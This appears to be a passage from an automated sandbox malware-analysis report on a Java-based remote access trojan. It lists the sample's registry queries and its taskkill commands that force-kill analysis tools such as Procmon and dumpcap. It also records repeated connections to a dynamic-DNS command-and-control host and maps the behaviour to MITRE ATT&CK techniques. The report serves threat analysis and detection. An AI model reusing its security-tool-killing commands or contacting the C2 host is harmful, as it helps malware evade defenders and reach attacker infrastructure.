- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
    3⤵
    PID:1780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
    3⤵
    PID:1524
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:1496
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:1112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:1784
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1272
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:1848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:1520
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1892
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1932
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1520
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1600

Network

DNS

donbube.duckdns.org

Remote address:

8.8.8.8:53

Request

donbube.duckdns.org

IN A

Response

donbube.duckdns.org

IN A

197.210.227.65
DNS

donbube.duckdns.org

Remote address:

8.8.8.8:53

Request

donbube.duckdns.org

IN A

Response

donbube.duckdns.org

IN A

197.210.227.65

197.210.227.65:2554

donbube.duckdns.org

java.exe

152 B
3
197.210.227.65:2554

donbube.duckdns.org

java.exe

152 B
3
197.210.227.65:2554

donbube.duckdns.org

java.exe

152 B
3
197.210.227.65:2554

donbube.duckdns.org

java.exe

152 B
3
197.210.227.65:2554

donbube.duckdns.org

java.exe

152 B
3
197.210.227.65:2554

donbube.duckdns.org

java.exe

52 B
1

8.8.8.8:53

donbube.duckdns.org

dns

65 B
81 B
1
1

DNS Request

donbube.duckdns.org

DNS Response

197.210.227.65
8.8.8.8:53

donbube.duckdns.org

dns

65 B
81 B
1
1

DNS Request

donbube.duckdns.org

DNS Response

197.210.227.65

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2028-132-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/2028-77-0x0000000002250000-0x0000000002251000-memory.dmp

Filesize
4KB

Download
memory/2028-162-0x0000000002730000-0x0000000002731000-memory.dmp

Filesize
4KB

Download
memory/2028-164-0x0000000002740000-0x0000000002741000-memory.dmp

Filesize
4KB

Download
memory/2028-39-0x000007FEF6470000-0x000007FEF6E5C000-memory.dmp

Filesize
9.9MB

Download
memory/2028-89-0x0000000002430000-0x0000000002431000-memory.dmp

Filesize
4KB

Download
memory/2028-98-0x0000000002460000-0x0000000002461000-memory.dmp

Filesize
4KB

Download
memory/2028-79-0x000000001ABE0000-0x000000001ABE1000-memory.dmp

Filesize
4KB

Download
memory/2028-139-0x0000000002640000-0x0000000002641000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.